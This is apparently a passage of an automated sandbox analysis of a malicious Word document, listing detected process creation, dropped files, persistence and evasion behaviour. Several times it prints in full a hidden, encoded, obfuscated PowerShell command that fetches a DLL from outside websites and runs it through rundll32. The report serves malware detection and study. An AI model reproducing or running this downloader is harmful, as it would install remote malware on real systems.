AHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                    Suspicious powershell command line foundShow sources
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008085 push ecx; ret
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004ADA push ecx; ret

                    Persistence and Installation Behavior:

                    barindex
                    Creates processes via WMIShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzuJump to behavior

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Crppsin\fgsajt.gvd:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fohbyq\ikksw.jnv:Zone.Identifier read attributes | delete
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
